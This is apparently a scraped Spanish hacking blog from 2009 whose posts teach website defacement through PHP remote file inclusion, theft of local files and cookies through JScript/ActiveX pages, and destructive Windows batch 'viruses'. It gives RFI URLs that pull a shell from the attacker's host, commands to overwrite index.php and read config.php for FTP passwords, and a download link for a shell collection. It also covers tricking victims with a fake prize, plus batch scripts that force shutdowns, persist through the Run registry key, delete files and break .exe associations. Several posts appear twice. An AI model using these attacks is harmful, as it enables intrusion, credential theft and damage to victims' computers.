Como ya Explique, Esta tecnica se basa en un bug de webs programadas en PHP.
Esta tecnica nos deja meter nuestra Shell para poder ejecutar comandos Linux/Unix.
Ahora Empezemos. Un Pequeño Ejemplo imaginemonos que nos encontramos esta Web:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=Links
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Lo Primero que tenemos que hacer es ver si podemos meterle nuestra Shell, Asi:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=ls
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Dejenme Explicarles como Funciona:
www.Rario.com
Esta es la web Vulnerable
---
Index.php? Tambien conocido como Main. php?, Home.php? etc...
Esta es la Pagina Principal
---
seccion=
Variable en PHP para ir a alguna Seccion especial tambien puede cambiar
---
http://yo.tuhost.com/Rario/yo.gif
Url de Nuestra Shell, si no Tienes tu Host Abre uno (Yo recomiendo Miarroba)
Siempre ponle una extencion diferente, que no sea Php, Html etc... para mas
seguridad pone extencion Gif, Sh etc... Por que sino la estariamos corriendo
en Nuestra maquina.
---
?&cmd=
Esto le pondremos despues de nuestra URL con la shell para ejecutar un Comando.
---
LS
Este es el Comando de Linux a ejecutar,nos enlista los archivos del servidor
Al introducir nuestra shell con exito no debera salir una tabla con datos del Servidor.
Tambien te Dice si tienes permiso de Escritura si los tienes ya tienes tu deface.
Un deface simple es Ponerle un "Echo Hacked by Rario"
Si en la tabla de tu shell te aparece la pagina principal asi:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www/home/rario
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Solo tenemos que hacer esto:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=cd/www/home/Rario/;echo Hacked by Rario>index.php
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Al introducir esta direccion esto es lo que Pasa:
CD
Nos lleva a alguna carpeta en esta caso www/home/rario
---
;Echo
este Comando muestra en la pantalla un texto en este caso Hacked by Rario
---
>
Este Comando inserta el comando anterior a algun archivo en este caso Index.php
Tambien se podria buscar el Archivo Config.php,Ahi se encuentra la contraseña del FTP
Para hacer esto tendriamos que introducir algo asi:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=cd/www/home/rario/;cat config.php
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
y nos Mostrara algo asi:
Host:RarioBlog
User:Rario
Password:Blog
Con esto puedes usar un cliente FTP y subir tu index mejorado.
Pero si no tuvieramos permiso de escritura,pasaremos a buscar archivos y carpetas que tengan permisos.
Para Buscar dichos archivos se introduciria algo asi:
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.rario.com/index.php?seccion=http://yo.tuhost.com/rario/shell.gif?&Cmd=cd/www/home/rario/;find -perm 777
°º¤ø,¸¸,ø¤º°`°º¤ø,¸
Find
El comando Find pues tal como dice (en ingles) sirve para Buscar
---
-perm 777
Significa Permisos
En pocas palabras te enlistara todos los archivos con permiso para que los Defaces.
Por Ultimo, Si al meter tu shell te sale un error quiere decir que la web tiene bugs en su PHP, consiguete un RPVS para buscar vulnerabilidades en esa Web.
Si al introducir tu shell te lleva a la pagina principal es que esta bien actualizada asi que empieza a buscar otra web =D.
viernes, 4 de septiembre de 2009
Introduccion al RFI
Hola, Ahora les enseñare como Hacer un Deface por RFI, pero te preguntaras que es RFI No?...
Esta es la Respuesta:
RFI (Remote file Inclision)
Es una tecnica de defacing que explota un bug en webs programadas en php, el problema radica en
un include que esta mal puesto y nos deja meter nuestra shell para hacer nuestro RFI
Ok..., Pero que es una Shell?
Es un sencillo programa dedicado para ejecutar comandos mas rapido, sin necesitar alguna interfaze grafica....por ejemplo la shell de Windows seria CMD, Pero en este caso al ser PHP Necesitaremos una shell que ejecute comandos Linux/Unix
Esta Bien pero como consigo Una?
Pues se los Dejo Facil, Aqui hay 138 Shells a escoger =D
http://www.mediafire.com/?3zykklaw2yd
Pass: Rario
Ya tienes una Shell, Ya sabes que es un RFI pero como usas la Shell?
pues miren estos son los Comandos de Unix/Linux mas comunes y probablemente los unicos que vamos a usar
ls Nos enlista los archivos y carpetas del servidor web
cd Nos sirve para saltarnos a alguna carpeta
cat Nos muestra el codigo fuente del algun archivo
id Nos dice si tenemos permisos de escritura
mkdir Con este comando borramos algun archivo
wget Subimos un archvio
Esta es la Respuesta:
RFI (Remote file Inclision)
Es una tecnica de defacing que explota un bug en webs programadas en php, el problema radica en
un include que esta mal puesto y nos deja meter nuestra shell para hacer nuestro RFI
Ok..., Pero que es una Shell?
Es un sencillo programa dedicado para ejecutar comandos mas rapido, sin necesitar alguna interfaze grafica....por ejemplo la shell de Windows seria CMD, Pero en este caso al ser PHP Necesitaremos una shell que ejecute comandos Linux/Unix
Esta Bien pero como consigo Una?
Pues se los Dejo Facil, Aqui hay 138 Shells a escoger =D
http://www.mediafire.com/?3zykklaw2yd
Pass: Rario
Ya tienes una Shell, Ya sabes que es un RFI pero como usas la Shell?
pues miren estos son los Comandos de Unix/Linux mas comunes y probablemente los unicos que vamos a usar
ls Nos enlista los archivos y carpetas del servidor web
cd Nos sirve para saltarnos a alguna carpeta
cat Nos muestra el codigo fuente del algun archivo
id Nos dice si tenemos permisos de escritura
mkdir Con este comando borramos algun archivo
wget Subimos un archvio
Hacking con JScript II
<html>
<body>
<script language="javascript">
var shell = new ActiveXObject ("WScript.Shell");
shell.Run("C:\windows\system32\logoff.exe")
</script>
</body>
<center><code><h1>The Rario Blog</h1></code>
</html>Este es otro codigo en JScript,si tu victima lo acepta se ejecuta
C:\Windows\System32\logoff.exe
Con este simple codigo estamos cerrando la sesion del usuario.
porsupuesto pueden ejecutar cualquier archivo en la pc del usuario.
Unos ejemplos
C:\WINDOWS\system32\dfrg.exe ==> Sirve para desfragmentar el Disco Duro
C:\WINDOWS\system32\calc.exe ==> Abre la calculadora
C:\WINDOWS\system32\edit.exe => Muestra algunas librerias y las podemos editar
C:\WINDOWS\system32\format.exe => Formate Unidades de Disco
C:\WINDOWS\system32\mspaint.exe => Abre Paint
C:\WINDOWS\system32\notepad.exe => Abre Block de notas
C:\WINDOWS\system32\osk.exe ==> Muestra Teclado en pantalla
El programa que quieran abrir Siempre debe de estar dentro de la Variable shell.run C:\....
lunes, 20 de julio de 2009
Hacking con JScript
Lo que vamos a lograr con este Tutorial es algo parecido a un XSS (En el caso de querer Robar cookies o algun archivo del HD) Tambien veremos como tener control de alguna aplicacion de nuestra victima e intentaremos sacar informacion de alguno de sus atchivos y lo mandaremos a nuestro servidor.
El Lenguaje JavaScript sirver para reducir la libertad del usuario en nuestras paginas web,Aun que en si no podamos colocar nunguna operacion realmente peligrosa, Salvo explotando Bugs del los navegadores.En Cambio JScript es una Implementacion de JavaScript que funciona en los Navegadores como internet Explorer,Lo que caracteriza a Jscript es que puede Sacar Muchas mas Operaciones que JavaScript y permite interactuar con Windows con ActiveX lo cual nos da un gran poder sobre la Maquina,Pasemos a lo Interesante:
Robando Informacion en C:\
Empezemos..Abran su Editor HTLM y coloquen el Siguiente Codigo dentro de los Targets
<Html> </Html>
<html>
<body>
<form name=f method=post action=prueba.htm>
<input type=hidden name=datos>
</form>
<script Language=JScript>
var obj = new ActiveXObject("Scripting.FileSystemObject");
var file = obj.GetFile("C:\prueba.txt");
var stream = file.OpenAsTextStream(1, -2);
var line = stream.ReadLine();
document.f.datos.value = line;
stream.Close();
document.f.submit();
</script>
</body>
<center><code><h1>www.TheRarioBlog.blogspot.com</h1></code>
</html>
Siempre que IE va a leer un texto JScript te pide si estas seguro que puede ser dañiño etc... dile a tu victima que es una descarga o algo inventale un "premio" utiliza tu imaginacion.
Si acepto leer la pagina con el codigo de arriba como ejemplo acabas de extraer lo que se encuentra en la ubicacion C:\\prueba.txt y copiar todo el contenido a tu servidor en la pagina prueba.htm,este es un Sencillo ejemplo de lo que puedes hacer con JScript ... bien puedes sacarle el archivo C:\Documents and Settings\usuario\cookies\usuario@hotmail.msn[1].txt y sacarle el usuario de hotmail (donde dice usuario debes de cambiarle al nombre de la sesion de su PC)
- Pare esto Nescesitaremos un servidor les recomiendo mucho el de Mi@
- Conocimientos basicos en JScript
- Editor para paginas web en HTLM (Podemos usar el Bloc de Notas)
El Lenguaje JavaScript sirver para reducir la libertad del usuario en nuestras paginas web,Aun que en si no podamos colocar nunguna operacion realmente peligrosa, Salvo explotando Bugs del los navegadores.En Cambio JScript es una Implementacion de JavaScript que funciona en los Navegadores como internet Explorer,Lo que caracteriza a Jscript es que puede Sacar Muchas mas Operaciones que JavaScript y permite interactuar con Windows con ActiveX lo cual nos da un gran poder sobre la Maquina,Pasemos a lo Interesante:
Robando Informacion en C:\
Empezemos..Abran su Editor HTLM y coloquen el Siguiente Codigo dentro de los Targets
<Html> </Html>
<html>
<body>
<form name=f method=post action=prueba.htm>
<input type=hidden name=datos>
</form>
<script Language=JScript>
var obj = new ActiveXObject("Scripting.FileSystemObject");
var file = obj.GetFile("C:\prueba.txt");
var stream = file.OpenAsTextStream(1, -2);
var line = stream.ReadLine();
document.f.datos.value = line;
stream.Close();
document.f.submit();
</script>
</body>
<center><code><h1>www.TheRarioBlog.blogspot.com</h1></code>
</html>
Siempre que IE va a leer un texto JScript te pide si estas seguro que puede ser dañiño etc... dile a tu victima que es una descarga o algo inventale un "premio" utiliza tu imaginacion.
Si acepto leer la pagina con el codigo de arriba como ejemplo acabas de extraer lo que se encuentra en la ubicacion C:\\prueba.txt y copiar todo el contenido a tu servidor en la pagina prueba.htm,este es un Sencillo ejemplo de lo que puedes hacer con JScript ... bien puedes sacarle el archivo C:\Documents and Settings\usuario\cookies\usuario@hotmail.msn[1].txt y sacarle el usuario de hotmail (donde dice usuario debes de cambiarle al nombre de la sesion de su PC)
domingo, 19 de julio de 2009
Los Virus en Batch II
Ahora crearemos un Virus “Mortal” para una PC de alguien. Esta es la base del Virus:
@Echo Off
Title Apagar
shutdown -r -f -t 5
exit
Este Código apagara la Computadora en 5 Segundos.
Pero Imaginense Que se Ejecute cada vez que La PC se prenda…
Pues eso es lo que Aremos
Lo Primero que Tenemos que Hacer es Crearlo en una Carpeta Escondida para el Ojo Humano Mortal.
Despues Agregarlo al Registro en RUN
Y Eso se logra Asi:
@echo off
CD C:\Windows\system32
Echo @echo off > virus.bat
Echo .
Shutdown -r -s -t 5 >> virus.bat
Echo Exit >> virus.bat
Exit
Entienden lo Que Hemos Hecho no? Pues si No Vuelvan a Leer todo los post de batch desde el Principio y Frente a una PC.
Ahora solo tenemos que Agregarlo al Registro y eso se Hace Asi:
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run/v virus.bat/t reg_sz /d C:\windows\system32 /f
Y Listo Ya tenemos su Primer Virus.
@Echo Off
Title Apagar
shutdown -r -f -t 5
exit
Este Código apagara la Computadora en 5 Segundos.
Pero Imaginense Que se Ejecute cada vez que La PC se prenda…
Pues eso es lo que Aremos
Lo Primero que Tenemos que Hacer es Crearlo en una Carpeta Escondida para el Ojo Humano Mortal.
Despues Agregarlo al Registro en RUN
Y Eso se logra Asi:
@echo off
CD C:\Windows\system32
Echo @echo off > virus.bat
Echo .
Shutdown -r -s -t 5 >> virus.bat
Echo Exit >> virus.bat
Exit
Entienden lo Que Hemos Hecho no? Pues si No Vuelvan a Leer todo los post de batch desde el Principio y Frente a una PC.
Ahora solo tenemos que Agregarlo al Registro y eso se Hace Asi:
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run/v virus.bat/t reg_sz /d C:\windows\system32 /f
Y Listo Ya tenemos su Primer Virus.
Los Virus en Batch
Hola Todos. Primero antes que Nada déjenme Explicarles el Comando :
Shutdown Este Comando Puede Variar de los Attributos que lo Acompañen
-R Se reiniciara el Equipo
-s Se Apagara el Equipo
-F Se apagara Forzosamente
-t Indica el Tiempo en el que se apagara la PC
-c Puedes Incluir un Mensaje
Ahora si Empecemos.
Empezemos con Algo Basico…
Un Bucle
Un Bucle es un Virus que Abrira ventanas o Programas hasta que los cierres
Ejemplo:
@Echo Off
Title Bucle
Goto Bucle
:Bucle
Start TheRarioBlog.Blogspot.Com
Goto Bucle
Imaginense lo que Pasa, Pobre tipo si no lo logra cerrar al principio del bucle tendrá que reiniciar.
Un Matador de Procesos
Lo que Aremos es Eliminar el MSN y Apagar la PC En 10 Segundos con el Mensaje: Muajajajajajajajajajajajajaja
@Echo Off
TaskKill /F /I Msnmsgr.exe
Shutdown –s –t 10 –c “Muajajajajajajajajajajajajaja”
El Clásico Chinga PC’S con Vacuna
Ahora con este nos Desharemos de los .Exe (no de forma permanente)
@Echo Off
Title Chinga PC’S
Assoc* .exe=.Rario
*Ese comando Hace que Los .Exe se Traten de Abrir como .Rario que no Existe para arreglarlo vuelve a ascociar un .exe con el .exe (si lo vas a probar trae la vacuna en una USB ya que no puedes abrir el bloc o créala antes
Shutdown Este Comando Puede Variar de los Attributos que lo Acompañen
-R Se reiniciara el Equipo
-s Se Apagara el Equipo
-F Se apagara Forzosamente
-t Indica el Tiempo en el que se apagara la PC
-c Puedes Incluir un Mensaje
Ahora si Empecemos.
Empezemos con Algo Basico…
Un Bucle
Un Bucle es un Virus que Abrira ventanas o Programas hasta que los cierres
Ejemplo:
@Echo Off
Title Bucle
Goto Bucle
:Bucle
Start TheRarioBlog.Blogspot.Com
Goto Bucle
Imaginense lo que Pasa, Pobre tipo si no lo logra cerrar al principio del bucle tendrá que reiniciar.
Un Matador de Procesos
Lo que Aremos es Eliminar el MSN y Apagar la PC En 10 Segundos con el Mensaje: Muajajajajajajajajajajajajaja
@Echo Off
TaskKill /F /I Msnmsgr.exe
Shutdown –s –t 10 –c “Muajajajajajajajajajajajajaja”
El Clásico Chinga PC’S con Vacuna
Ahora con este nos Desharemos de los .Exe (no de forma permanente)
@Echo Off
Title Chinga PC’S
Assoc* .exe=.Rario
*Ese comando Hace que Los .Exe se Traten de Abrir como .Rario que no Existe para arreglarlo vuelve a ascociar un .exe con el .exe (si lo vas a probar trae la vacuna en una USB ya que no puedes abrir el bloc o créala antes
Mas Comandos
En el Próximo Post Nos adentraremos en La introducción a los Virus. Así que tengo que empezar a enseñarles comandos relacionados a aplicaciones y virus. Empecemos.
Estos son Los Comandos Básicos a Recordar
DEL Borra Archivos. Por Ejemplo:
@Echo Off
Title Borrar
Del /Q /S /F C:\Windows\System32\Rario
Exit
Aquí Estoy Eliminando La Carpeta Rario del System32.
Del Tiene Sub-Comandos Por Decirlo Así que Hacen Esto:
\P Pide Confirmación Para Borrar
\Q Modo Silencioso (No Pide Confirmación)
\F Fuerza Bruta… También Borra Archivos de Solo Lectura
\S Borra También los Subdirectorios
Start Ejecutas un Archivo o Abres una Pagina web Ejemplo:
@Echo Off
Title Blog
Start TheRarioBlog.Blogspot.Com
Exit
Este Comando Abriria Mi Pagina Web con Tu Explorador Predeterminado
TaskKill Mata un Procesó (/F Fuerza Bruta)
Format (Unidad) Formateas un Disco Duro
Msg* Abre una Ventana con Un Mensaje.
Reg Add Añade una Entrada al Registro
> Crea un Archivo
>> Se Salta hasta la Ultima Linea del Archibo e Incluye lo Que Desee
Ejemplo:
@Echo Off
Title TXT
Echo TheRarioBlog.blogspot.com>C:\Rario.txt
Con este Comando se crea un .TXT con mi Pagina en C:\
* Substituye Cualquier Archivo Posible Ejemplo:
@Echo Off
Title Substituir
Del /Q /f *.JPEG
Exit
Esto Elimina TODOS los Archivos JPEG
? Substituye una Letra Ejemplo:
@Echo Off
Title Substituir II
Del /Q /f AB?.*
Exit
Esto Eliminara Todos los Archivos Con El Nombre AB y Cualquier Otro Carácter.
CHDIR o CD Cambia al Directorio Indicado
CD C:\Windows Te Envía a la Carpeta Windows o la Deseada
CD.. Ir al Directorio Superior
CD\\ Ir a la Raiz
ATTRIB Muestra y te Permite Cambiar los Atributos del Archivo Indicado Ejemplo:
@Echo Off
Title Attrib
Attrib C:\Rario (Digamos que me dice que esta Oculto)
Attrib C:\Rario -H
Con El Parametro /S Buscas Tambien en Subdirectorios.
Los atributos son:
H = Oculto
R = Lectura
S = Sistema.
A = Modificado.
Se activan o Desactivan con el Simbolo + o – Antes de la Letra
Estos y Los comandos que as Vistos son Comandos Básico Ahora es Hora de pasar a los Virus.
Estos son Los Comandos Básicos a Recordar
DEL Borra Archivos. Por Ejemplo:
@Echo Off
Title Borrar
Del /Q /S /F C:\Windows\System32\Rario
Exit
Aquí Estoy Eliminando La Carpeta Rario del System32.
Del Tiene Sub-Comandos Por Decirlo Así que Hacen Esto:
\P Pide Confirmación Para Borrar
\Q Modo Silencioso (No Pide Confirmación)
\F Fuerza Bruta… También Borra Archivos de Solo Lectura
\S Borra También los Subdirectorios
Start Ejecutas un Archivo o Abres una Pagina web Ejemplo:
@Echo Off
Title Blog
Start TheRarioBlog.Blogspot.Com
Exit
Este Comando Abriria Mi Pagina Web con Tu Explorador Predeterminado
TaskKill Mata un Procesó (/F Fuerza Bruta)
Format (Unidad) Formateas un Disco Duro
Msg* Abre una Ventana con Un Mensaje.
Reg Add Añade una Entrada al Registro
> Crea un Archivo
>> Se Salta hasta la Ultima Linea del Archibo e Incluye lo Que Desee
Ejemplo:
@Echo Off
Title TXT
Echo TheRarioBlog.blogspot.com>C:\Rario.txt
Con este Comando se crea un .TXT con mi Pagina en C:\
* Substituye Cualquier Archivo Posible Ejemplo:
@Echo Off
Title Substituir
Del /Q /f *.JPEG
Exit
Esto Elimina TODOS los Archivos JPEG
? Substituye una Letra Ejemplo:
@Echo Off
Title Substituir II
Del /Q /f AB?.*
Exit
Esto Eliminara Todos los Archivos Con El Nombre AB y Cualquier Otro Carácter.
CHDIR o CD Cambia al Directorio Indicado
CD C:\Windows Te Envía a la Carpeta Windows o la Deseada
CD.. Ir al Directorio Superior
CD\\ Ir a la Raiz
ATTRIB Muestra y te Permite Cambiar los Atributos del Archivo Indicado Ejemplo:
@Echo Off
Title Attrib
Attrib C:\Rario (Digamos que me dice que esta Oculto)
Attrib C:\Rario -H
Con El Parametro /S Buscas Tambien en Subdirectorios.
Los atributos son:
H = Oculto
R = Lectura
S = Sistema.
A = Modificado.
Se activan o Desactivan con el Simbolo + o – Antes de la Letra
Estos y Los comandos que as Vistos son Comandos Básico Ahora es Hora de pasar a los Virus.
Suscribirse a:
Entradas (Atom)
